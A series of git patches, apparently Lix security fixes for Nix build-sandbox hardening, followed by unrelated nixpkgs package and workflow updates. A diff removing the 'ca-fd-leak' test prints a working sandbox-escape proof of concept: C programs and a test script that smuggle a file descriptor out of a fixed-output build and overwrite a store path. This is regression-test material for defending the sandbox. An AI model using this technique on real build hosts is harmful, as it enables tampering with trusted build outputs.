updateScript = gitUpdater { ++ url = "https://passt.top/passt"; ++ }; ++ }; ++ ++ meta = with lib; { ++ homepage = "https://passt.top/passt/about/"; ++ description = "Plug A Simple Socket Transport"; ++ longDescription = '' ++ passt implements a translation layer between a Layer-2 network interface ++ and native Layer-4 sockets (TCP, UDP, ICMP/ICMPv6 echo) on a host. ++ It doesn't require any capabilities or privileges, and it can be used as ++ a simple replacement for Slirp. ++ ++ pasta (same binary as passt, different command) offers equivalent ++ functionality, for network namespaces: traffic is forwarded using a tap ++ interface inside the namespace, without the need to create further ++ interfaces on the host, hence not requiring any capabilities or ++ privileges. ++ ''; ++ license = [ ++ licenses.bsd3 # and ++ licenses.gpl2Plus ++ ]; ++ platforms = platforms.linux; ++ maintainers = with maintainers; [ _8aed ]; ++ mainProgram = "passt"; ++ }; ++}) +diff --git a/package.nix b/package.nix +index 3a2e08c8c..f1fd1b1f9 100644 +--- a/package.nix ++++ b/package.nix +@@ -45,6 +45,8 @@ + ninja, + ncurses, + openssl, ++ # FIXME: we need passt 2024_12_11.09478d5 or newer, i.e. nixos 25.05 or later ++ passt-lix ? __forDefaults.passt-lix, + pegtl, + pkg-config, + python3, +@@ -116,6 +118,8 @@ + # needs derivation patching to add debuginfo and coroutine library support + # !! must build this with clang as it is affected by the gcc coroutine bugs + capnproto-lix = callPackage ./misc/capnproto.nix { inherit stdenv; }; ++ ++ passt-lix = callPackage ./misc/passt.nix { }; + }, + }: + +@@ -249,6 +253,7 @@ stdenv.mkDerivation (finalAttrs: { + # which don't actually get added to PATH. And buildInputs is correct over + # nativeBuildInputs since this should be a busybox executable on the host. 
+ "-Dsandbox-shell=${lib.getExe' busybox-sandbox-shell "busybox"}" ++ "-Dpasta-path=${lib.getExe' passt-lix "pasta"}" + ] + ++ lib.optional hostPlatform.isStatic "-Denable-embedded-sandbox-shell=true" + ++ lib.optional (finalAttrs.dontBuild && !lintInsteadOfBuild) "-Denable-build=false" +@@ -334,6 +339,7 @@ stdenv.mkDerivation (finalAttrs: { + ++ lib.optionals hostPlatform.isLinux [ + libseccomp + busybox-sandbox-shell ++ passt-lix + ] + ++ lib.optionals ( + stdenv.hostPlatform.isDarwin && lib.versionOlder stdenv.hostPlatform.darwinSdkVersion "11.0" +diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix +deleted file mode 100644 +index a6ae72adc..000000000 +--- a/tests/nixos/ca-fd-leak/default.nix ++++ /dev/null +@@ -1,90 +0,0 @@ +-# Nix is a sandboxed build system. But Not everything can be handled inside its +-# sandbox: Network access is normally blocked off, but to download sources, a +-# trapdoor has to exist. Nix handles this by having "Fixed-output derivations". +-# The detail here is not important, but in our case it means that the hash of +-# the output has to be known beforehand. And if you know that, you get a few +-# rights: you no longer run inside a special network namespace! +-# +-# Now, Linux has a special feature, that not many other unices do: Abstract +-# unix domain sockets! Not only that, but those are namespaced using the +-# network namespace! That means that we have a way to create sockets that are +-# available in every single fixed-output derivation, and also all processes +-# running on the host machine! Now, this wouldn't be that much of an issue, as, +-# well, the whole idea is that the output is pure, and all processes in the +-# sandbox are killed before finalizing the output. What if we didn't need those +-# processes at all? Unix domain sockets have a semi-known trick: you can pass +-# file descriptors around! +-# This makes it possible to exfiltrate a file-descriptor with write access to +-# $out outside of the sandbox. And that file-descriptor can be used to modify +-# the contents of the store path after it has been registered. +- +-{ config, ... }: +- +-let +- pkgs = config.nodes.machine.nixpkgs.pkgs; +- +- # Simple C program that sends a a file descriptor to `$out` to a Unix +- # domain socket. +- # Compiled statically so that we can easily send it to the VM and use it +- # inside the build sandbox. +- sender = pkgs.runCommandWith { +- name = "sender"; +- stdenv = pkgs.pkgsStatic.stdenv; +- } '' +- $CC -static -o $out ${./sender.c} +- ''; +- +- # Okay, so we have a file descriptor shipped out of the FOD now. But the +- # Nix store is read-only, right? .. Well, yeah. But this file descriptor +- # lives in a mount namespace where it is not! So even when this file exists +- # in the actual Nix store, we're capable of just modifying its contents... +- smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c); +- +- # The abstract socket path used to exfiltrate the file descriptor +- socketName = "FODSandboxExfiltrationSocket"; +-in +-{ +- name = "ca-fd-leak"; +- +- nodes.machine = +- { config, lib, pkgs, ... 
}: +- { virtualisation.writableStore = true; +- nix.settings.substituters = lib.mkForce [ ]; +- virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ]; +- }; +- +- testScript = { nodes }: '' +- start_all() +- +- machine.succeed("echo hello") +- # Start the smuggler server +- machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &") +- +- # Build the smuggled derivation. +- # This will connect to the smuggler server and send it the file descriptor +- machine.succeed(r""" +- nix-build -E ' +- builtins.derivation { +- name = "smuggled"; +- system = builtins.currentSystem; +- # look ma, no tricks! +- outputHashMode = "flat"; +- outputHashAlgo = "sha256"; +- outputHash = builtins.hashString "sha256" "hello, world\n"; +- builder = "${pkgs.busybox-sandbox-shell}/bin/sh"; +- args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ]; +- }' +- """.strip()) +- +- +- # Tell the smuggler server that we're done +- machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}") +- +- # Check that the file was not modified +- machine.succeed(r""" +- cat ./result +- test "$(cat ./result)" = "hello, world" +- """.strip()) +- ''; +- +-} +diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c +deleted file mode 100644 +index 75e54fc8f..000000000 +--- a/tests/nixos/ca-fd-leak/sender.c ++++ /dev/null +@@ -1,65 +0,0 @@ +-#include +-#include +-#include +-#include +-#include +-#include +-#include +-#include +-#include +-#include +- +-int main(int argc, char **argv) { +- +- assert(argc == 2); +- +- int sock = socket(AF_UNIX, SOCK_STREAM, 0); +- +- // Set up a abstract domain socket path to connect to. +- struct sockaddr_un data; +- data.sun_family = AF_UNIX; +- data.sun_path[0] = 0; +- strcpy(data.sun_path + 1, argv[1]); +- +- // Now try to connect, To ensure we work no matter what order we are +- // executed in, just busyloop here. +- int res = -1; +- while (res < 0) { +- res = connect(sock, (const struct sockaddr *)&data, +- offsetof(struct sockaddr_un, sun_path) +- + strlen(argv[1]) +- + 1); +- if (res < 0 && errno != ECONNREFUSED) perror("connect"); +- if (errno != ECONNREFUSED) break; +- } +- +- // Write our message header. +- struct msghdr msg = {0}; +- msg.msg_control = malloc(128); +- msg.msg_controllen = 128; +- +- // Write an SCM_RIGHTS message containing the output path. +- struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); +- hdr->cmsg_len = CMSG_LEN(sizeof(int)); +- hdr->cmsg_level = SOL_SOCKET; +- hdr->cmsg_type = SCM_RIGHTS; +- int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640); +- memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); +- +- msg.msg_controllen = CMSG_SPACE(sizeof(int)); +- +- // Write a single null byte too. +- msg.msg_iov = malloc(sizeof(struct iovec)); +- msg.msg_iov[0].iov_base = ""; +- msg.msg_iov[0].iov_len = 1; +- msg.msg_iovlen = 1; +- +- // Send it to the othher side of this connection. +- res = sendmsg(sock, &msg, 0); +- if (res < 0) perror("sendmsg"); +- int buf; +- +- // Wait for the server to close the socket, implying that it has +- // received the commmand. 
+- recv(sock, (void *)&buf, sizeof(int), 0); +-} +diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c +deleted file mode 100644 +index 82acf37e6..000000000 +--- a/tests/nixos/ca-fd-leak/smuggler.c ++++ /dev/null +@@ -1,66 +0,0 @@ +-#include +-#include +-#include +-#include +-#include +-#include +-#include +- +-int main(int argc, char **argv) { +- +- assert(argc == 2); +- +- int sock = socket(AF_UNIX, SOCK_STREAM, 0); +- +- // Bind to the socket. +- struct sockaddr_un data; +- data.sun_family = AF_UNIX; +- data.sun_path[0] = 0; +- strcpy(data.sun_path + 1, argv[1]); +- int res = bind(sock, (const struct sockaddr *)&data, +- offsetof(struct sockaddr_un, sun_path) +- + strlen(argv[1]) +- + 1); +- if (res < 0) perror("bind"); +- +- res = listen(sock, 1); +- if (res < 0) perror("listen"); +- +- int smuggling_fd = -1; +- +- // Accept the connection a first time to receive the file descriptor. +- fprintf(stderr, "%s\n", "Waiting for the first connection"); +- int a = accept(sock, 0, 0); +- if (a < 0) perror("accept"); +- +- struct msghdr msg = {0}; +- msg.msg_control = malloc(128); +- msg.msg_controllen = 128; +- +- // Receive the file descriptor as sent by the smuggler. +- recvmsg(a, &msg, 0); +- +- struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); +- while (hdr) { +- if (hdr->cmsg_level == SOL_SOCKET +- && hdr->cmsg_type == SCM_RIGHTS) { +- +- // Grab the copy of the file descriptor. +- memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int)); +- } +- +- hdr = CMSG_NXTHDR(&msg, hdr); +- } +- fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection"); +- close(a); +- +- // Wait for a second connection, which will tell us that the build is +- // done +- a = accept(sock, 0, 0); +- fprintf(stderr, "%s\n", "Got a second connection, rewriting the file"); +- // Write a new content to the file +- if (ftruncate(smuggling_fd, 0)) perror("ftruncate"); +- char * new_content = "Pwned\n"; +- int written_bytes = write(smuggling_fd, new_content, strlen(new_content)); +- if (written_bytes != strlen(new_content)) perror("write"); +-} +diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix +index 474b4ad64..2ad0923e1 100644 +--- a/tests/nixos/default.nix ++++ b/tests/nixos/default.nix +@@ -160,8 +160,6 @@ in + ["i686-linux" "x86_64-linux"] + (system: runNixOSTestFor system ./setuid/setuid.nix); + +- ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak; +- + fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git; + + symlinkResolvconf = runNixOSTestFor "x86_64-linux" ./symlink-resolvconf.nix; +diff --git a/tests/nixos/fetchurl.nix b/tests/nixos/fetchurl.nix +index 719405be5..1626e1c03 100644 +--- a/tests/nixos/fetchurl.nix ++++ b/tests/nixos/fetchurl.nix +@@ -52,7 +52,7 @@ in + + security.pki.certificateFiles = [ "${goodCert}/cert.pem" ]; + +- networking.hosts."127.0.0.1" = [ "good" "bad" ]; ++ networking.hosts."192.168.1.1" = [ "good" "bad" ]; + + virtualisation.writableStore = true; + +-- +2.49.0 + + +From 05eba34893122d395774b4ee5eaf4c03ae588ea0 Mon Sep 17 00:00:00 2001 +From: eldritch horrors +Date: Sun, 30 Mar 2025 16:45:34 +0200 +Subject: [SECURITY FIX 11/12] libstore: don't default build-dir to temp-dir + +if a build directory is accessible to other users it is possible to +smuggle data in and out of build directories. usually this is only +a build purity problem, but in combination with other issues it can +be used to break out of a build sandbox.
to prevent this we default +to using a subdirectory of nixStateDir (which is more restrictive). + +Change-Id: Iacfc9b50534de158618c815f9fb99d7dae1be4d0 +--- + doc/manual/rl-next/build-dir-mandatory.md | 12 +++++++++++ + lix/libstore/build/local-derivation-goal.cc | 4 +++- + lix/libstore/settings/build-dir.md | 18 ++++++++++++---- + misc/systemd/nix-daemon.conf.in | 3 ++- + .../build-remote-trustless-should-fail-0.sh | 1 - + tests/functional/build-remote-trustless.sh | 1 - + tests/functional/build-remote.sh | 1 - + tests/functional/check.sh | 21 ------------------- + tests/functional/supplementary-groups.sh | 1 - + 9 files changed, 31 insertions(+), 31 deletions(-) + create mode 100644 doc/manual/rl-next/build-dir-mandatory.md + +diff --git a/doc/manual/rl-next/build-dir-mandatory.md b/doc/manual/rl-next/build-dir-mandatory.md +new file mode 100644 +index 000000000..6f69bbba3 +--- /dev/null ++++ b/doc/manual/rl-next/build-dir-mandatory.md +@@ -0,0 +1,12 @@ ++--- ++synopsis: "`build-dir` no longer defaults to `temp-dir`" ++cls: [] ++category: "Fixes" ++credits: [horrors] ++--- ++ ++The directory in which temporary build directories are created no longer defaults ++to the value of the `temp-dir` setting to avoid builders making their directories ++world-accessible. This behavior has been used to escape the build sandbox and can ++cause build impurities even when not used maliciously. We now default to `builds` ++in `NIX_STATE_DIR` (which is `/nix/var/nix/builds` in the default configuration). +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index 7ccb0ad33..2e22f2544 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -435,10 +435,12 @@ try { + }); + } + ++ createDirs(settings.buildDir.get()); ++ + /* Create a temporary directory where the build will take + place. */ + tmpDir = createTempDir( +- settings.buildDir.get().value_or(""), ++ settings.buildDir.get(), + "nix-build-" + std::string(drvPath.name()), + false, + false, +diff --git a/lix/libstore/settings/build-dir.md b/lix/libstore/settings/build-dir.md +index f518d52a5..738368622 100644 +--- a/lix/libstore/settings/build-dir.md ++++ b/lix/libstore/settings/build-dir.md +@@ -1,14 +1,24 @@ + --- + name: build-dir + internalName: buildDir +-settingType: PathsSetting> +-default: null ++settingType: PathsSetting ++defaultText: "`«nixStateDir»/builds`" ++defaultExpr: nixStateDir + "/builds" + --- + The directory on the host, in which derivations' temporary build directories are created. + +-If not set, Nix will use the [`temp-dir`](#conf-temp-dir) setting if set, otherwise the system temporary directory indicated by the `TMPDIR` environment variable. +-Note that builds are often performed by the Nix daemon, so its `TMPDIR` is used, and not that of the Nix command line interface. ++If not set, Lix will use the `builds` subdirectory of its configured state directory. ++Lix will create this directory automatically with suitable permissions if it does not ++exist; otherwise, its permissions must allow all users to traverse the directory (i.e. ++it must have `o+x` set, in Unix parlance) for non-sandboxed builds to work correctly. + + This is also the location where [`--keep-failed`](@docroot@/command-ref/opt-common.md#opt-keep-failed) leaves its files. + + If Nix runs without sandbox, or if the platform does not support sandboxing with bind mounts (e.g.
macOS), then the [`builder`](@docroot@/language/derivations.md#attr-builder)'s environment will contain this directory, instead of the virtual location [`sandbox-build-dir`](#conf-sandbox-build-dir). ++ ++> Important: ++> ++> `build-dir` must not be set to a world-writable directory. Placing temporary build ++> directories in a world-writable place allows other users to access or modify build ++> data that is currently in use. This alone is merely an impurity, but combined with ++> another factor this has allowed malicious derivations to escape the build sandbox. +diff --git a/misc/systemd/nix-daemon.conf.in b/misc/systemd/nix-daemon.conf.in +index e7b264234..a0ddc4019 100644 +--- a/misc/systemd/nix-daemon.conf.in ++++ b/misc/systemd/nix-daemon.conf.in +@@ -1 +1,2 @@ +-d @localstatedir@/nix/daemon-socket 0755 root root - - ++d @localstatedir@/nix/daemon-socket 0755 root root - - ++d @localstatedir@/nix/builds 0755 root root 7d - +diff --git a/tests/functional/build-remote-trustless-should-fail-0.sh b/tests/functional/build-remote-trustless-should-fail-0.sh +index 1582a7b32..e938e63a2 100644 +--- a/tests/functional/build-remote-trustless-should-fail-0.sh ++++ b/tests/functional/build-remote-trustless-should-fail-0.sh +@@ -8,7 +8,6 @@ requireSandboxSupport + [[ $busybox =~ busybox ]] || skipTest "no busybox" + + unset NIX_STORE_DIR +-unset NIX_STATE_DIR + + # We first build a dependency of the derivation we eventually want to + # build. +diff --git a/tests/functional/build-remote-trustless.sh b/tests/functional/build-remote-trustless.sh +index 81e5253bf..a0733fd4a 100644 +--- a/tests/functional/build-remote-trustless.sh ++++ b/tests/functional/build-remote-trustless.sh +@@ -2,7 +2,6 @@ requireSandboxSupport + [[ $busybox =~ busybox ]] || skipTest "no busybox" + + unset NIX_STORE_DIR +-unset NIX_STATE_DIR + + remoteDir=$TEST_ROOT/remote + +diff --git a/tests/functional/build-remote.sh b/tests/functional/build-remote.sh +index 9b2f5feaf..c7aa09745 100644 +--- a/tests/functional/build-remote.sh ++++ b/tests/functional/build-remote.sh +@@ -3,7 +3,6 @@ requireSandboxSupport + + # Avoid store dir being inside sandbox build-dir + unset NIX_STORE_DIR +-unset NIX_STATE_DIR + + function join_by { local d=$1; shift; echo -n "$1"; shift; printf "%s" "${@/#/$d}"; } + +diff --git a/tests/functional/check.sh b/tests/functional/check.sh +index fc63b9e21..e6d017aa1 100644 +--- a/tests/functional/check.sh ++++ b/tests/functional/check.sh +@@ -49,27 +49,6 @@ test_custom_build_dir() { + } + test_custom_build_dir + +-test_custom_temp_dir() { +- # like test_custom_build_dir(), but uses the temp-dir setting instead +- # build-dir inherits from temp-dir when build-dir is unset +- local customTempDir="$TEST_ROOT/custom-temp-dir" +- +- mkdir "$customTempDir" +- nix-build check.nix -A failed --argstr checkBuildId $checkBuildId \ +- --no-out-link --keep-failed --option temp-dir "$customTempDir" 2> $TEST_ROOT/log || status=$? 
+- [ "$status" = "100" ] +- [[ 1 == "$(count "$customTempDir/nix-build-"*)" ]] +- local buildDir="$customTempDir/nix-build-"* +- grep $checkBuildId $buildDir/checkBuildId +- +- # also check a separate code path that doesn't involve build-dir +- # nix-shell uses temp-dir for its rcfile path +- rcpath=$(NIX_BUILD_SHELL=$SHELL nix-shell check.nix -A deterministic --option temp-dir "$customTempDir" --run 'echo $0' 2> $TEST_ROOT/log) +- # rcpath is /nix-shell-*/rc +- [[ $rcpath = "$customTempDir"/* ]] +-} +-test_custom_temp_dir +- + test_shell_preserves_tmpdir() { + # ensure commands that spawn interactive shells don't overwrite TMPDIR with temp-dir + local envTempDir=$TEST_ROOT/shell-temp-dir-env +diff --git a/tests/functional/supplementary-groups.sh b/tests/functional/supplementary-groups.sh +index d18fb2414..c1a949eb4 100644 +--- a/tests/functional/supplementary-groups.sh ++++ b/tests/functional/supplementary-groups.sh +@@ -10,7 +10,6 @@ unshare --mount --map-root-user bash < +Date: Sat, 26 Apr 2025 20:38:58 +0200 +Subject: [SECURITY FIX 12/12] libstore/build: automatic cleanup of + unsuccessfully built scratch outputs + +When a build fails, its scratch output paths are not cleaned up. + +Until recently, this was deemed not a problem, but as part of the effort +to harden Nix builds and protect these paths against being part of a +staged attack (race conditions, etc.), we now automatically clean up after +failed builds. + +Change-Id: I58481b1cc83826298b9d80d37fecf81f117ccb09 +Signed-off-by: Raito Bezarius +--- + .../aggressive-derivation-output-cleanups.md | 15 +++++++ + lix/libstore/build/local-derivation-goal.cc | 41 +++++++++++++++---- + lix/libstore/build/local-derivation-goal.hh | 15 ++++++- + tests/nixos/default.nix | 3 ++ + tests/nixos/non-chroot-misc/default.nix | 34 +++++++++++++++ + 5 files changed, 99 insertions(+), 9 deletions(-) + create mode 100644 doc/manual/rl-next/aggressive-derivation-output-cleanups.md + create mode 100644 tests/nixos/non-chroot-misc/default.nix + +diff --git a/doc/manual/rl-next/aggressive-derivation-output-cleanups.md b/doc/manual/rl-next/aggressive-derivation-output-cleanups.md +new file mode 100644 +index 000000000..7e94b99df +--- /dev/null ++++ b/doc/manual/rl-next/aggressive-derivation-output-cleanups.md +@@ -0,0 +1,15 @@ ++--- ++synopsis: "Always clean up scratch paths after derivations fail to build" ++issues: [] ++cls: [] ++category: "Fixes" ++credits: ["raito", "horrors"] ++--- ++ ++Previously, scratch paths created during builds were not always cleaned up if ++the derivation failed, potentially leaving behind unnecessary temporary files ++or directories in the Nix store. ++ ++This fix ensures that such paths are consistently removed after a failed build, ++improving Nix store hygiene and hardening Lix against mis-reuse of failed ++builds' scratch paths. +diff --git a/lix/libstore/build/local-derivation-goal.cc b/lix/libstore/build/local-derivation-goal.cc +index 2e22f2544..13bda5df9 100644 +--- a/lix/libstore/build/local-derivation-goal.cc ++++ b/lix/libstore/build/local-derivation-goal.cc +@@ -393,9 +393,13 @@ void LocalDerivationGoal::cleanupPostOutputsRegisteredModeCheck() + + void LocalDerivationGoal::cleanupPostOutputsRegisteredModeNonCheck() + { +- /* Delete unused redirected outputs (when doing hash rewriting). */ +- for (auto & i : redirectedOutputs) +- deletePath(worker.store.Store::toRealPath(i.second)); ++ /* In the past, redirected outputs were manually tracked for deletion.
++ * Now that we have the scratch outputs cleaner, which is a superset of ++ * the redirected outputs, we just fire all uncancelled automatic deleters. ++ * ++ * This should clean up any paths that are NOT registered in the database. ++ */ ++ scratchOutputsCleaner.clear(); + + /* Delete the chroot (if we were using one). */ + autoDelChroot.reset(); /* this runs the destructor */ +@@ -483,6 +487,10 @@ try { + to use a temporary path */ + makeFallbackPath(status.known->path); + scratchOutputs.insert_or_assign(outputName, scratchPath); ++ /* Schedule this scratch output path for automatic deletion ++ * if we do not cancel it, e.g. when registering the outputs. ++ */ ++ scratchOutputsCleaner.emplace(outputName, worker.store.printStorePath(scratchPath)); + + /* Substitute output placeholders with the scratch output paths. + We'll use during the build. */ +@@ -505,8 +513,6 @@ try { + std::string h2 { scratchPath.hashPart() }; + inputRewrites[h1] = h2; + } +- +- redirectedOutputs.insert_or_assign(std::move(fixedFinalPath), std::move(scratchPath)); + } + + /* Construct the environment passed to the builder. */ +@@ -1966,7 +1972,9 @@ try { + } + + /* Don't register anything, since we already have the +- previous versions which we're comparing. */ ++ previous versions which we're comparing. ++ NOTE: this means that the `.check` path will be automatically deleted. ++ */ + continue; + } + +@@ -1990,8 +1998,13 @@ try { + /* If it's a CA path, register it right away. This is necessary if it + isn't statically known so that we can safely unlock the path before + the next iteration */ +- if (newInfo.ca) ++ if (newInfo.ca) { + TRY_AWAIT(localStore.registerValidPaths({{newInfo.path, newInfo}})); ++ /* Cancel automatic deletion of that output if it was a scratch output. */ ++ if (auto cleaner = scratchOutputsCleaner.extract(outputName)) { ++ cleaner.mapped().cancel(); ++ } ++ } + + infos.emplace(outputName, std::move(newInfo)); + } +@@ -2030,6 +2043,13 @@ try { + infos2.insert_or_assign(newInfo.path, newInfo); + } + TRY_AWAIT(localStore.registerValidPaths(infos2)); ++ ++ /* Cancel automatic deletion of that output if it was a scratch output that we just registered. */ ++ for (auto & [outputName, _ ] : infos) { ++ if (auto cleaner = scratchOutputsCleaner.extract(outputName)) { ++ cleaner.mapped().cancel(); ++ } ++ } + } + + /* In case of a fixed-output derivation hash mismatch, throw an +@@ -2057,6 +2077,13 @@ try { + builtOutputs.emplace(outputName, thisRealisation); + } + ++ /* NOTE: At this point, not all outputs may have been registered. ++ * Therefore, there may remain pending auto-deleters in the cleaner list (`scratchOutputsCleaner`). ++ * ++ * They will eventually be deleted, but we have no way to assert that they all have been; e.g. ++ * `assert(scratchOutputsCleaner.size() == 0)` cannot be written. ++ */ ++ + co_return builtOutputs; + } catch (...) { + co_return result::current_exception(); +diff --git a/lix/libstore/build/local-derivation-goal.hh b/lix/libstore/build/local-derivation-goal.hh +index a0031e141..7e1b9a632 100644 +--- a/lix/libstore/build/local-derivation-goal.hh ++++ b/lix/libstore/build/local-derivation-goal.hh +@@ -111,8 +111,6 @@ struct LocalDerivationGoal : public DerivationGoal + * Hash rewriting. + */ + StringMap inputRewrites, outputRewrites; +- typedef map RedirectedOutputs; +- RedirectedOutputs redirectedOutputs; + + /** + * The outputs paths used during the build. +@@ -129,6 +127,19 @@ struct LocalDerivationGoal : public DerivationGoal + * self-references.
+ */ + OutputPathMap scratchOutputs; ++ /** ++ * Output paths used during the build are scheduled for ++ * automatic cleanup unless they have been successfully built. ++ * ++ * `registerOutputs` takes care of cancelling the cleanups ++ * and clearing this map. ++ * ++ * `startBuilder` takes care of filling this map ++ * as `scratchOutputs` gets filled. ++ * ++ * This is a map from output names to automatic delete handles. ++ */ ++ std::map scratchOutputsCleaner; + + /** + * Path registration info from the previous round, if we're +diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix +index 2ad0923e1..7b9e11613 100644 +--- a/tests/nixos/default.nix ++++ b/tests/nixos/default.nix +@@ -164,6 +164,9 @@ in + + symlinkResolvconf = runNixOSTestFor "x86_64-linux" ./symlink-resolvconf.nix; + ++ # Use this test for things that cannot easily be tested under chroot Nix stores in the functional test suite. ++ non-chroot-misc = runNixOSTestFor "x86_64-linux" ./non-chroot-misc; ++ + noNewPrivilegesInSandbox = runNixOSTestFor "x86_64-linux" ./no-new-privileges/sandbox.nix; + + noNewPrivilegesOutsideSandbox = runNixOSTestFor "x86_64-linux" ./no-new-privileges/no-sandbox.nix; +diff --git a/tests/nixos/non-chroot-misc/default.nix b/tests/nixos/non-chroot-misc/default.nix +new file mode 100644 +index 000000000..93a66a595 +--- /dev/null ++++ b/tests/nixos/non-chroot-misc/default.nix +@@ -0,0 +1,34 @@ ++{ ... }: ++# Misc things we want to test inside a non-redirected, non-chroot Nix store. ++let ++ nonAutoCleaningFailingDerivationCode = '' ++ derivation { ++ name = "scratch-failing"; ++ system = builtins.currentSystem; ++ builder = "/bin/sh"; ++ args = [ (builtins.toFile "builder.sh" "echo bonjour > $out; echo out: $out; false") ]; ++ } ++ ''; ++in ++{ ++ name = "non-chroot-sandbox-misc"; ++ ++ nodes.machine = { ++ }; ++ ++ testScript = { nodes }: '' ++ import re ++ start_all() ++ ++ # You might ask yourself: why write such a convoluted thing? ++ # The conditions for fooling Nix into NOT cleaning up the output path are non-trivial and unclear. ++ # This is one of those: create a derivation, mkdir or touch the $out path, communicate it back. ++ # Even with a sandboxed Lix, you will observe leftovers before 2.93.0. After this version, this test passes.
++ result = machine.fail("""nix-build --substituters "" -E '${nonAutoCleaningFailingDerivationCode}' 2>&1""") ++ match = re.search(r'out: (\S+)', result) ++ assert match is not None, "Did not find Nix store path in the result of the failing build" ++ outpath = match.group(1).strip() ++ print(f"Found Nix store path: {outpath}") ++ machine.fail(f'stat {outpath}') ++ ''; ++} +-- +2.49.0 + From 6ff856f8db7b3b352cd31bf5b383e182a93cdf52 Mon Sep 17 00:00:00 2001 From: PerchunPak Date: Sat, 21 Jun 2025 14:59:34 +0200 Subject: [PATCH 68/73] appmenu-glib-translator: address code review --- .../ap/appmenu-glib-translator/package.nix | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/pkgs/by-name/ap/appmenu-glib-translator/package.nix b/pkgs/by-name/ap/appmenu-glib-translator/package.nix index 88265a3086c0..310b3e5b5548 100644 --- a/pkgs/by-name/ap/appmenu-glib-translator/package.nix +++ b/pkgs/by-name/ap/appmenu-glib-translator/package.nix @@ -1,15 +1,13 @@ { lib, fetchFromGitLab, + stdenv, glib, - gtk3, + gobject-introspection, meson, ninja, pkg-config, - gobject-introspection, vala, - stdenv, - wrapGAppsHook3, }: stdenv.mkDerivation (finalAttrs: { pname = "appmenu-glib-translator"; @@ -19,7 +17,6 @@ stdenv.mkDerivation (finalAttrs: { owner = "vala-panel-project"; repo = "vala-panel-appmenu"; tag = finalAttrs.version; - fetchSubmodules = true; hash = "sha256-v5J3nwViNiSKRPdJr+lhNUdKaPG82fShPDlnmix5tlY="; }; @@ -30,19 +27,15 @@ stdenv.mkDerivation (finalAttrs: { ninja pkg-config - wrapGAppsHook3 + gobject-introspection vala ]; - buildInputs = [ - glib - gobject-introspection - gtk3 - ]; + propagatedBuildInputs = [ glib ]; meta = { - description = "GTK module that strips menus from all GTK programs, converts to MenuModel and sends to AppMenu"; - homepage = "https://gitlab.com/vala-panel-project/vala-panel-appmenu/-/tree/${finalAttrs.version}/subprojects/appmenu-gtk-module"; + description = "Library for translating from DBusMenu to GMenuModel"; + homepage = "https://gitlab.com/vala-panel-project/vala-panel-appmenu/-/tree/${finalAttrs.version}/subprojects/appmenu-glib-translator"; license = lib.licenses.lgpl3Plus; maintainers = with lib.maintainers; [ perchun ]; platforms = lib.platforms.linux; From 08881f6be70723e04aa9f978d8fb9d4bcc80da56 Mon Sep 17 00:00:00 2001 From: "R.
Ryantm" Date: Wed, 18 Jun 2025 06:02:33 +0000 Subject: [PATCH 69/73] crosvm: 0-unstable-2025-06-06 -> 0-unstable-2025-06-17 --- pkgs/by-name/cr/crosvm/package.nix | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/pkgs/by-name/cr/crosvm/package.nix b/pkgs/by-name/cr/crosvm/package.nix index eef6b3c0a398..f7dd05a63c6a 100644 --- a/pkgs/by-name/cr/crosvm/package.nix +++ b/pkgs/by-name/cr/crosvm/package.nix @@ -21,12 +21,12 @@ rustPlatform.buildRustPackage { pname = "crosvm"; - version = "0-unstable-2025-06-06"; + version = "0-unstable-2025-06-17"; src = fetchgit { url = "https://chromium.googlesource.com/chromiumos/platform/crosvm"; - rev = "7083e31d219cdcd57866c70144e1b39ddc008f0f"; - hash = "sha256-oZR4UcN8lDoqNoUFGLbIDDRO55noDX0xMWa8W0DbVl4="; + rev = "49e226a57f905b00e44a996c93d9a2439dcb86f3"; + hash = "sha256-+HtF9nBv6unnrav5Z84xSOhK+RrlOFBHed6SiuHAcfs="; fetchSubmodules = true; }; From ea10312659ed4de3533e25388c0615b59ed90df1 Mon Sep 17 00:00:00 2001 From: Wolfgang Walther Date: Tue, 24 Jun 2025 18:26:59 +0200 Subject: [PATCH 70/73] workflows: nix: 2.29.0 -> 2.29.1 --- .github/workflows/build.yml | 2 +- .github/workflows/codeowners-v2.yml | 4 ++-- .github/workflows/eval.yml | 6 +++--- .github/workflows/lint.yml | 6 +++--- .github/workflows/reviewers.yml | 2 +- 5 files changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 20600d9d9a31..29c7c68d631f 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -49,7 +49,7 @@ jobs: mergedSha: ${{ inputs.mergedSha }} merged-as-untrusted: true - - uses: cachix/install-nix-action@17fe5fb4a23ad6cbbe47d6b3f359611ad276644c # v31 + - uses: cachix/install-nix-action@f0fe604f8a612776892427721526b4c7cfb23aba # v31 with: extra_nix_config: sandbox = true diff --git a/.github/workflows/codeowners-v2.yml b/.github/workflows/codeowners-v2.yml index 89908ede868d..97fcfc63bdd2 100644 --- a/.github/workflows/codeowners-v2.yml +++ b/.github/workflows/codeowners-v2.yml @@ -59,7 +59,7 @@ jobs: 